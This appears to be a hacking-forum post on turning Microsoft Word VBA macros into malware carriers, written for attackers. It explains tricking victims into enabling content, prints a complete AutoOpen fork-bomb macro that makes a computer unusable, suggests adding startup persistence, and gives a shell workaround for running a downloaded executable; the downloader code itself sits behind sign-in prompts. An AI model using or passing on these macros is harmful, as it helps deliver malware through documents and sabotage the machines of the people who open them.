Locked Exploits of .doc – MS Word Documents

[dEEpEst]

Microsoft Office Word documents have “macro” functionality which is implemented in Visual Basic for Applications (VBA) programming language. VBA is nearly the same as Visual Basic, main difference is that VB compiles to an executable and VBA needs a document as a carrier.

In my previous article, I analyzed .svg images for spreading malware. SVG images used embedded JavaScript which runs in a browser which poses some restrictions. VBA on the other hand runs as an executable, thus has more permissions.

Some social engineering is needed for victim to click ‘Enable Content’, but I don’t think that’s difficult. That button loads and starts the scripts. Clicking ‘enable content’ is enough for malware to get installed. Very often social engineering trick is to use Microsoft’s generic option: Enable macros to view content.

Visual Basic is powerful programming language, I’ve seen Remote Administrator Tools written in Visual Basic. However, adding such malware to a document would greatly increase its size. Also, detaching from a document carrier is preferable because of some restrictions. Therefore, downloaders are more suitable to hackers. Additionally, changing the payload is also possible because it’s done on the server side.

 

This is the hidden content, please

• Sign In
• or
• Sign Up

 

 

Simple pranks for demonstration

This is how you view and record macros: open a document -> View -> Macros.

This is the hidden content, please

• Sign In
• or
• Sign Up

If we choose to record Macro, we have the option to assign macro to Button or Keyboard.

This is the hidden content, please

• Sign In
• or
• Sign Up

But we’re going to choose AutoOpen() option so we don’t need that – our script can execute as soon as macro is enabled. For example, this script opens a calculator upon opening the document. It will ask for permission (Enable Content) only first time it executes:

 

This is the hidden content, please

• Sign In
• or
• Sign Up

 

It will stop when the document is closed, but we can detach from the document. This script creates and starts a forkbomb.bat – Windows bash script that executes some terminal commands. Forkbomb.bat starts 2 copies of itself. Both of those do the same thing, resulting in exponential growth which completely depletes computer resources:

Sub AutoOpen()Shell("cmd.exe /S /K" & "echo %0^|%0 > forkbomb.bat")Shell("cmd.exe /S /K" & "forkbomb.bat")End Sub

This is the hidden content, please

• Sign In
• or
• Sign Up

 

Causing unusable computer, force restart is necessary to kill it. Something like this is expected:

This is the hidden content, please

• Sign In
• or
• Sign Up

You can extend the script to make it run when pc is started to clog his/her pc once again. Safe boot would be the solution then.

VBA download and execute file upon opening

Thanks to malmoe for his share – A short VBA macro to download and execute a file.

This is the hidden content, please

• Sign In
• or
• Sign Up

Simple script downloads and executes, just by enabling content on a document.

Malmoe used Shell(file.exe”) which causes a permission error on my Windows 10 MS Word 2010. However if I use this workaround from my fork bomb

Shell("cmd.exe /S /K" & "file.exe")

This is the hidden content, please

• Sign In
• or
• Sign Up

…downloaded program executes normally.

Conclusion

Word macros are a bit restricted Visual Basic executables. With some sneakiness, it can be used to compromise a system by downloading and executing a ‘real’ .exe – macros are as dangerous as executables!